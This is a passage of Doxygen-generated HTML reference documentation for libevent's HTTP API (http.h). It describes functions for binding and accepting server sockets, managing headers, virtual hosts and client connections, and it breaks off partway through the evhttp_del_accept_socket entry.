<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">enum <a class="el" href="http_8h.html#a47ca41a942899d019bf59cf32301ae4f">evhttp_request_kind</a></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>a request object can represent either a request or a reply </p>
</div>
</div>
<hr/><h2>Function Documentation</h2>
<a class="anchor" id="aa5719654012b143ebfc0dfc9d4a8490d"></a><!-- doxytag: member="http.h::evhttp_accept_socket" ref="aa5719654012b143ebfc0dfc9d4a8490d" args="(struct evhttp *http, evutil_socket_t fd)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">int <a class="el" href="http_8h.html#aa5719654012b143ebfc0dfc9d4a8490d">evhttp_accept_socket</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp.html">evhttp</a> * </td>
<td class="paramname"><em>http</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype"><a class="el" href="util_8h.html#a7ef0023565082a65020f6e56be59fd0b">evutil_socket_t</a> </td>
<td class="paramname"><em>fd</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Makes an HTTP server accept connections on the specified socket.</p>
<p>This may be useful to create a socket and then fork multiple instances of an http server, or when a socket has been communicated via file descriptor passing in situations where an http servers does not have permissions to bind to a low-numbered port.</p>
<p>Can be called multiple times to have the http server listen to multiple different sockets.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">http</td><td>a pointer to an evhttp object </td></tr>
<tr><td class="paramname">fd</td><td>a socket fd that is ready for accepting connections </td></tr>
</table>
</dd>
</dl>
<dl class="return"><dt><b>Returns:</b></dt><dd>0 on success, -1 on failure. </dd></dl>
<dl class="see"><dt><b>See also:</b></dt><dd><a class="el" href="http_8h.html#a80ea2b819c0997a0ecc0d915446aeaa4">evhttp_bind_socket()</a> </dd></dl>
</div>
</div>
<a class="anchor" id="ae0b17d7e600e87cadda2352ea2135d8f"></a><!-- doxytag: member="http.h::evhttp_accept_socket_with_handle" ref="ae0b17d7e600e87cadda2352ea2135d8f" args="(struct evhttp *http, evutil_socket_t fd)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">struct <a class="el" href="structevhttp__bound__socket.html">evhttp_bound_socket</a>* <a class="el" href="http_8h.html#ae0b17d7e600e87cadda2352ea2135d8f">evhttp_accept_socket_with_handle</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp.html">evhttp</a> * </td>
<td class="paramname"><em>http</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype"><a class="el" href="util_8h.html#a7ef0023565082a65020f6e56be59fd0b">evutil_socket_t</a> </td>
<td class="paramname"><em>fd</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td><code> [read]</code></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Like <a class="el" href="http_8h.html#aa5719654012b143ebfc0dfc9d4a8490d">evhttp_accept_socket()</a>, but returns a handle for referencing the socket.</p>
<p>The returned pointer is not valid after <em>http</em> is freed.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">http</td><td>a pointer to an evhttp object </td></tr>
<tr><td class="paramname">fd</td><td>a socket fd that is ready for accepting connections </td></tr>
</table>
</dd>
</dl>
<dl class="return"><dt><b>Returns:</b></dt><dd>Handle for the socket on success, NULL on failure. </dd></dl>
<dl class="see"><dt><b>See also:</b></dt><dd><a class="el" href="http_8h.html#aa5719654012b143ebfc0dfc9d4a8490d">evhttp_accept_socket()</a>, <a class="el" href="http_8h.html#a5404c30f3b50a664f2ec1500ebb30d86">evhttp_del_accept_socket()</a> </dd></dl>
</div>
</div>
<a class="anchor" id="a04e3f41c14b8e0e74da13a8d308b93b7"></a><!-- doxytag: member="http.h::evhttp_add_header" ref="a04e3f41c14b8e0e74da13a8d308b93b7" args="(struct evkeyvalq *headers, const char *key, const char *value)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">int <a class="el" href="http_8h.html#a04e3f41c14b8e0e74da13a8d308b93b7">evhttp_add_header</a> </td>
<td>(</td>
<td class="paramtype">struct evkeyvalq * </td>
<td class="paramname"><em>headers</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">const char * </td>
<td class="paramname"><em>key</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">const char * </td>
<td class="paramname"><em>value</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Adds a header to a list of existing headers.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">headers</td><td>the evkeyvalq object to which to add a header </td></tr>
<tr><td class="paramname">key</td><td>the name of the header </td></tr>
<tr><td class="paramname">value</td><td>the value belonging to the header </td></tr>
</table>
</dd>
</dl>
<dl class="return"><dt><b>Returns:</b></dt><dd>0 on success, -1 otherwise. </dd></dl>
<dl class="see"><dt><b>See also:</b></dt><dd><a class="el" href="http_8h.html#a3a36842fd6f74977c9c0fb7aa5578832">evhttp_find_header()</a>, <a class="el" href="http_8h.html#adfd33f73c8d7af63a0da05ebb32b7e72">evhttp_clear_headers()</a> </dd></dl>
</div>
</div>
<a class="anchor" id="a58fe001925e7f65d7678bf90b31fc2a5"></a><!-- doxytag: member="http.h::evhttp_add_server_alias" ref="a58fe001925e7f65d7678bf90b31fc2a5" args="(struct evhttp *http, const char *alias)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">int <a class="el" href="http_8h.html#a58fe001925e7f65d7678bf90b31fc2a5">evhttp_add_server_alias</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp.html">evhttp</a> * </td>
<td class="paramname"><em>http</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">const char * </td>
<td class="paramname"><em>alias</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Add a server alias to an http object. The http object can be a virtual host or the main server.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">http</td><td>the evhttp object </td></tr>
<tr><td class="paramname">alias</td><td>the alias to add </td></tr>
</table>
</dd>
</dl>
<dl class="see"><dt><b>See also:</b></dt><dd>evhttp_add_remove_alias() </dd></dl>
</div>
</div>
<a class="anchor" id="a82d8fb72c5e8c76b787987ba5de5b141"></a><!-- doxytag: member="http.h::evhttp_add_virtual_host" ref="a82d8fb72c5e8c76b787987ba5de5b141" args="(struct evhttp *http, const char *pattern, struct evhttp *vhost)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">int <a class="el" href="http_8h.html#a82d8fb72c5e8c76b787987ba5de5b141">evhttp_add_virtual_host</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp.html">evhttp</a> * </td>
<td class="paramname"><em>http</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">const char * </td>
<td class="paramname"><em>pattern</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">struct <a class="el" href="structevhttp.html">evhttp</a> * </td>
<td class="paramname"><em>vhost</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Adds a virtual host to the http server.</p>
<p>A virtual host is a newly initialized evhttp object that has request callbacks set on it via <a class="el" href="http_8h.html#a5b685afe43d7f4c3bfcc7dcba72d41e0">evhttp_set_cb()</a> or <a class="el" href="http_8h.html#ad3466287c0054d32dfd538a3bdfb0374">evhttp_set_gencb()</a>. It most not have any listing sockets associated with it.</p>
<p>If the virtual host has not been removed by the time that <a class="el" href="http_8h.html#a849acf0f233772b486b8057fcf3aaf4a">evhttp_free()</a> is called on the main http server, it will be automatically freed, too.</p>
<p>It is possible to have hierarchical vhosts. For example: A vhost with the pattern *.example.com may have other vhosts with patterns foo.example.com and bar.example.com associated with it.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">http</td><td>the evhttp object to which to add a virtual host </td></tr>
<tr><td class="paramname">pattern</td><td>the glob pattern against which the hostname is matched. The match is case insensitive and follows otherwise regular shell matching. </td></tr>
<tr><td class="paramname">vhost</td><td>the virtual host to add the regular http server. </td></tr>
</table>
</dd>
</dl>
<dl class="return"><dt><b>Returns:</b></dt><dd>0 on success, -1 on failure </dd></dl>
<dl class="see"><dt><b>See also:</b></dt><dd><a class="el" href="http_8h.html#ab2eb1ac82f36e7f0180b18d4553d3994">evhttp_remove_virtual_host()</a> </dd></dl>
</div>
</div>
<a class="anchor" id="aa86abe883e71049f03534d984dd8c625"></a><!-- doxytag: member="http.h::evhttp_bind_listener" ref="aa86abe883e71049f03534d984dd8c625" args="(struct evhttp *http, struct evconnlistener *listener)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">struct <a class="el" href="structevhttp__bound__socket.html">evhttp_bound_socket</a>* <a class="el" href="http_8h.html#aa86abe883e71049f03534d984dd8c625">evhttp_bind_listener</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp.html">evhttp</a> * </td>
<td class="paramname"><em>http</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">struct <a class="el" href="structevconnlistener.html">evconnlistener</a> * </td>
<td class="paramname"><em>listener</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td><code> [read]</code></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>The most low-level evhttp_bind/accept method: takes an evconnlistener, and returns an <a class="el" href="structevhttp__bound__socket.html">evhttp_bound_socket</a>. The listener will be freed when the bound socket is freed. </p>
</div>
</div>
<a class="anchor" id="a80ea2b819c0997a0ecc0d915446aeaa4"></a><!-- doxytag: member="http.h::evhttp_bind_socket" ref="a80ea2b819c0997a0ecc0d915446aeaa4" args="(struct evhttp *http, const char *address, ev_uint16_t port)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">int <a class="el" href="http_8h.html#a80ea2b819c0997a0ecc0d915446aeaa4">evhttp_bind_socket</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp.html">evhttp</a> * </td>
<td class="paramname"><em>http</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">const char * </td>
<td class="paramname"><em>address</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">ev_uint16_t </td>
<td class="paramname"><em>port</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Binds an HTTP server on the specified address and port.</p>
<p>Can be called multiple times to bind the same http server to multiple different ports.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">http</td><td>a pointer to an evhttp object </td></tr>
<tr><td class="paramname">address</td><td>a string containing the IP address to listen(2) on </td></tr>
<tr><td class="paramname">port</td><td>the port number to listen on </td></tr>
</table>
</dd>
</dl>
<dl class="return"><dt><b>Returns:</b></dt><dd>0 on success, -1 on failure. </dd></dl>
<dl class="see"><dt><b>See also:</b></dt><dd><a class="el" href="http_8h.html#aa5719654012b143ebfc0dfc9d4a8490d">evhttp_accept_socket()</a> </dd></dl>
</div>
</div>
<a class="anchor" id="a7b2e494399364cfb8071e69564c33db9"></a><!-- doxytag: member="http.h::evhttp_bind_socket_with_handle" ref="a7b2e494399364cfb8071e69564c33db9" args="(struct evhttp *http, const char *address, ev_uint16_t port)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">struct <a class="el" href="structevhttp__bound__socket.html">evhttp_bound_socket</a>* <a class="el" href="http_8h.html#a7b2e494399364cfb8071e69564c33db9">evhttp_bind_socket_with_handle</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp.html">evhttp</a> * </td>
<td class="paramname"><em>http</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">const char * </td>
<td class="paramname"><em>address</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">ev_uint16_t </td>
<td class="paramname"><em>port</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td><code> [read]</code></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Like <a class="el" href="http_8h.html#a80ea2b819c0997a0ecc0d915446aeaa4">evhttp_bind_socket()</a>, but returns a handle for referencing the socket.</p>
<p>The returned pointer is not valid after <em>http</em> is freed.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">http</td><td>a pointer to an evhttp object </td></tr>
<tr><td class="paramname">address</td><td>a string containing the IP address to listen(2) on </td></tr>
<tr><td class="paramname">port</td><td>the port number to listen on </td></tr>
</table>
</dd>
</dl>
<dl class="return"><dt><b>Returns:</b></dt><dd>Handle for the socket on success, NULL on failure. </dd></dl>
<dl class="see"><dt><b>See also:</b></dt><dd><a class="el" href="http_8h.html#a80ea2b819c0997a0ecc0d915446aeaa4">evhttp_bind_socket()</a>, <a class="el" href="http_8h.html#a5404c30f3b50a664f2ec1500ebb30d86">evhttp_del_accept_socket()</a> </dd></dl>
</div>
</div>
<a class="anchor" id="a5b5912e3d764bbd8f4952aba0f0604fa"></a><!-- doxytag: member="http.h::evhttp_bound_socket_get_fd" ref="a5b5912e3d764bbd8f4952aba0f0604fa" args="(struct evhttp_bound_socket *bound_socket)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname"><a class="el" href="util_8h.html#a7ef0023565082a65020f6e56be59fd0b">evutil_socket_t</a> <a class="el" href="http_8h.html#a5b5912e3d764bbd8f4952aba0f0604fa">evhttp_bound_socket_get_fd</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__bound__socket.html">evhttp_bound_socket</a> * </td>
<td class="paramname"><em>bound_socket</em></td><td>)</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Get the raw file descriptor referenced by an <a class="el" href="structevhttp__bound__socket.html">evhttp_bound_socket</a>.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">bound_socket</td><td>a handle returned by evhttp_{bind,accept}_socket_with_handle </td></tr>
</table>
</dd>
</dl>
<dl class="return"><dt><b>Returns:</b></dt><dd>the file descriptor used by the bound socket </dd></dl>
<dl class="see"><dt><b>See also:</b></dt><dd><a class="el" href="http_8h.html#a7b2e494399364cfb8071e69564c33db9">evhttp_bind_socket_with_handle()</a>, <a class="el" href="http_8h.html#ae0b17d7e600e87cadda2352ea2135d8f">evhttp_accept_socket_with_handle()</a> </dd></dl>
</div>
</div>
<a class="anchor" id="a7b9ba15b143ece0f69a2b4c52ff9d788"></a><!-- doxytag: member="http.h::evhttp_bound_socket_get_listener" ref="a7b9ba15b143ece0f69a2b4c52ff9d788" args="(struct evhttp_bound_socket *bound)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">struct <a class="el" href="structevconnlistener.html">evconnlistener</a>* <a class="el" href="http_8h.html#a7b9ba15b143ece0f69a2b4c52ff9d788">evhttp_bound_socket_get_listener</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__bound__socket.html">evhttp_bound_socket</a> * </td>
<td class="paramname"><em>bound</em></td><td>)</td>
<td><code> [read]</code></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Return the listener used to implement a bound socket. </p>
</div>
</div>
<a class="anchor" id="ab323fe297168f0f87af832f2bddc40a0"></a><!-- doxytag: member="http.h::evhttp_cancel_request" ref="ab323fe297168f0f87af832f2bddc40a0" args="(struct evhttp_request *req)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void <a class="el" href="http_8h.html#ab323fe297168f0f87af832f2bddc40a0">evhttp_cancel_request</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__request.html">evhttp_request</a> * </td>
<td class="paramname"><em>req</em></td><td>)</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Cancels a pending HTTP request.</p>
<p>Cancels an ongoing HTTP request. The callback associated with this request is not executed and the request object is freed. If the request is currently being processed, e.g. it is ongoing, the corresponding <a class="el" href="structevhttp__connection.html">evhttp_connection</a> object is going to get reset.</p>
<p>A request cannot be canceled if its callback has executed already. A request may be canceled reentrantly from its chunked callback.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">req</td><td>the <a class="el" href="structevhttp__request.html">evhttp_request</a> to cancel; req becomes invalid after this call. </td></tr>
</table>
</dd>
</dl>
</div>
</div>
<a class="anchor" id="adfd33f73c8d7af63a0da05ebb32b7e72"></a><!-- doxytag: member="http.h::evhttp_clear_headers" ref="adfd33f73c8d7af63a0da05ebb32b7e72" args="(struct evkeyvalq *headers)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void <a class="el" href="http_8h.html#adfd33f73c8d7af63a0da05ebb32b7e72">evhttp_clear_headers</a> </td>
<td>(</td>
<td class="paramtype">struct evkeyvalq * </td>
<td class="paramname"><em>headers</em></td><td>)</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Removes all headers from the header list.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">headers</td><td>the evkeyvalq object from which to remove all headers </td></tr>
</table>
</dd>
</dl>
</div>
</div>
<a class="anchor" id="af5913a2851880df25cf9ef43f7646074"></a><!-- doxytag: member="http.h::evhttp_connection_base_new" ref="af5913a2851880df25cf9ef43f7646074" args="(struct event_base *base, struct evdns_base *dnsbase, const char *address, unsigned short port)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">struct <a class="el" href="structevhttp__connection.html">evhttp_connection</a>* <a class="el" href="http_8h.html#af5913a2851880df25cf9ef43f7646074">evhttp_connection_base_new</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevent__base.html">event_base</a> * </td>
<td class="paramname"><em>base</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">struct <a class="el" href="structevdns__base.html">evdns_base</a> * </td>
<td class="paramname"><em>dnsbase</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">const char * </td>
<td class="paramname"><em>address</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">unsigned short </td>
<td class="paramname"><em>port</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td><code> [read]</code></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>A connection object that can be used to for making HTTP requests. The connection object tries to resolve address and establish the connection when it is given an http request object.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">base</td><td>the <a class="el" href="structevent__base.html">event_base</a> to use for handling the connection </td></tr>
<tr><td class="paramname">dnsbase</td><td>the dns_base to use for resolving host names; if not specified host name resolution will block. </td></tr>
<tr><td class="paramname">address</td><td>the address to which to connect </td></tr>
<tr><td class="paramname">port</td><td>the port to connect to </td></tr>
</table>
</dd>
</dl>
<dl class="return"><dt><b>Returns:</b></dt><dd>an <a class="el" href="structevhttp__connection.html">evhttp_connection</a> object that can be used for making requests </dd></dl>
</div>
</div>
<a class="anchor" id="ab5afe0ffd71e479a9d830ac3800ba599"></a><!-- doxytag: member="http.h::evhttp_connection_free" ref="ab5afe0ffd71e479a9d830ac3800ba599" args="(struct evhttp_connection *evcon)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void <a class="el" href="http_8h.html#ab5afe0ffd71e479a9d830ac3800ba599">evhttp_connection_free</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__connection.html">evhttp_connection</a> * </td>
<td class="paramname"><em>evcon</em></td><td>)</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Frees an http connection </p>
</div>
</div>
<a class="anchor" id="aeeec8fa8b1c5836d05a0e552793b0945"></a><!-- doxytag: member="http.h::evhttp_connection_get_base" ref="aeeec8fa8b1c5836d05a0e552793b0945" args="(struct evhttp_connection *req)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">struct <a class="el" href="structevent__base.html">event_base</a>* <a class="el" href="http_8h.html#aeeec8fa8b1c5836d05a0e552793b0945">evhttp_connection_get_base</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__connection.html">evhttp_connection</a> * </td>
<td class="paramname"><em>req</em></td><td>)</td>
<td><code> [read]</code></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Returns the underlying <a class="el" href="structevent__base.html">event_base</a> for this connection </p>
</div>
</div>
<a class="anchor" id="a39cc41e2c07c0a2042ecdd05248bd645"></a><!-- doxytag: member="http.h::evhttp_connection_get_bufferevent" ref="a39cc41e2c07c0a2042ecdd05248bd645" args="(struct evhttp_connection *evcon)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">struct <a class="el" href="structbufferevent.html">bufferevent</a>* <a class="el" href="http_8h.html#a39cc41e2c07c0a2042ecdd05248bd645">evhttp_connection_get_bufferevent</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__connection.html">evhttp_connection</a> * </td>
<td class="paramname"><em>evcon</em></td><td>)</td>
<td><code> [read]</code></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Return the bufferevent that an <a class="el" href="structevhttp__connection.html">evhttp_connection</a> is using. </p>
</div>
</div>
<a class="anchor" id="afa866e15c757e815a2e66cba7c8aa161"></a><!-- doxytag: member="http.h::evhttp_connection_get_peer" ref="afa866e15c757e815a2e66cba7c8aa161" args="(struct evhttp_connection *evcon, char **address, ev_uint16_t *port)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void <a class="el" href="http_8h.html#afa866e15c757e815a2e66cba7c8aa161">evhttp_connection_get_peer</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__connection.html">evhttp_connection</a> * </td>
<td class="paramname"><em>evcon</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">char ** </td>
<td class="paramname"><em>address</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">ev_uint16_t * </td>
<td class="paramname"><em>port</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Get the remote address and port associated with this connection. </p>
</div>
</div>
<a class="anchor" id="af62e12b843002e6eace204cc68da2277"></a><!-- doxytag: member="http.h::evhttp_connection_set_closecb" ref="af62e12b843002e6eace204cc68da2277" args="(struct evhttp_connection *evcon, void(*)(struct evhttp_connection *, void *), void *)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void <a class="el" href="http_8h.html#af62e12b843002e6eace204cc68da2277">evhttp_connection_set_closecb</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__connection.html">evhttp_connection</a> * </td>
<td class="paramname"><em>evcon</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">void(*)(struct <a class="el" href="structevhttp__connection.html">evhttp_connection</a> *, void *) </td>
<td class="paramname">, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">void * </td>
<td class="paramname"> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Set a callback for connection close. </p>
</div>
</div>
<a class="anchor" id="a839b6cd03f4377fead26e8b680e9cd7e"></a><!-- doxytag: member="http.h::evhttp_connection_set_local_address" ref="a839b6cd03f4377fead26e8b680e9cd7e" args="(struct evhttp_connection *evcon, const char *address)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void <a class="el" href="http_8h.html#a839b6cd03f4377fead26e8b680e9cd7e">evhttp_connection_set_local_address</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__connection.html">evhttp_connection</a> * </td>
<td class="paramname"><em>evcon</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">const char * </td>
<td class="paramname"><em>address</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>sets the ip address from which http connections are made </p>
</div>
</div>
<a class="anchor" id="a3a325b818c5c4f48a8ba1f3cf6a49d7f"></a><!-- doxytag: member="http.h::evhttp_connection_set_local_port" ref="a3a325b818c5c4f48a8ba1f3cf6a49d7f" args="(struct evhttp_connection *evcon, ev_uint16_t port)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void <a class="el" href="http_8h.html#a3a325b818c5c4f48a8ba1f3cf6a49d7f">evhttp_connection_set_local_port</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__connection.html">evhttp_connection</a> * </td>
<td class="paramname"><em>evcon</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">ev_uint16_t </td>
<td class="paramname"><em>port</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>sets the local port from which http connections are made </p>
</div>
</div>
<a class="anchor" id="a9356b2a28a3b08bf273d027d1c40f470"></a><!-- doxytag: member="http.h::evhttp_connection_set_retries" ref="a9356b2a28a3b08bf273d027d1c40f470" args="(struct evhttp_connection *evcon, int retry_max)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void <a class="el" href="http_8h.html#a9356b2a28a3b08bf273d027d1c40f470">evhttp_connection_set_retries</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__connection.html">evhttp_connection</a> * </td>
<td class="paramname"><em>evcon</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">int </td>
<td class="paramname"><em>retry_max</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Sets the retry limit for this connection - -1 repeats indefinitely </p>
</div>
</div>
<a class="anchor" id="aa145623b7f58efe51908c6e48060db8c"></a><!-- doxytag: member="http.h::evhttp_connection_set_timeout" ref="aa145623b7f58efe51908c6e48060db8c" args="(struct evhttp_connection *evcon, int timeout_in_secs)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void <a class="el" href="http_8h.html#aa145623b7f58efe51908c6e48060db8c">evhttp_connection_set_timeout</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__connection.html">evhttp_connection</a> * </td>
<td class="paramname"><em>evcon</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">int </td>
<td class="paramname"><em>timeout_in_secs</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Sets the timeout for events related to this connection </p>
</div>
</div>
<a class="anchor" id="a681a8e967dec9f73fb8e27f465fdae4b"></a><!-- doxytag: member="http.h::evhttp_decode_uri" ref="a681a8e967dec9f73fb8e27f465fdae4b" args="(const char *uri)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">char* <a class="el" href="http_8h.html#a681a8e967dec9f73fb8e27f465fdae4b">evhttp_decode_uri</a> </td>
<td>(</td>
<td class="paramtype">const char * </td>
<td class="paramname"><em>uri</em></td><td>)</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Helper function to sort of decode a URI-encoded string. Unlike evhttp_get_decoded_uri, it decodes all plus characters that appear _after_ the first question mark character, but no plusses that occur before. This is not a good way to decode URIs in whole or in part.</p>
<p>The returned string must be freed by the caller</p>
<dl class="deprecated"><dt><b><a class="el" href="deprecated.html#_deprecated000034">Deprecated:</a></b></dt><dd>This function is deprecated; you probably want to use evhttp_get_decoded_uri instead.</dd></dl>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">uri</td><td>an encoded URI </td></tr>
</table>
</dd>
</dl>
<dl class="return"><dt><b>Returns:</b></dt><dd>a newly allocated unencoded URI or NULL on failure </dd></dl>
</div>
</div>
<a class="anchor" id="a5404c30f3b50a664f2ec1500ebb30d86"></a><!-- doxytag: member="http.h::evhttp_del_accept_socket" ref="a5404c30f3b50a664f2ec1500ebb30d86" args="(struct evhttp *http, struct evhttp_bound_socket *bound_socket)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void <a class="el" href="http_8h.html#a5404c30f3b50a664f2ec1500ebb30d86">evhttp_del_accept_socket</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp.html">evhttp</a> * </td>
<td class="paramname"><em>http</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">struct <a class="el" href="structevhttp__bound__socket.html">evhttp_bound_socket</a> * </td>
<td class="paramname"><em>bound_socket</em> </td>
</tr>
<tr>
<td></td>
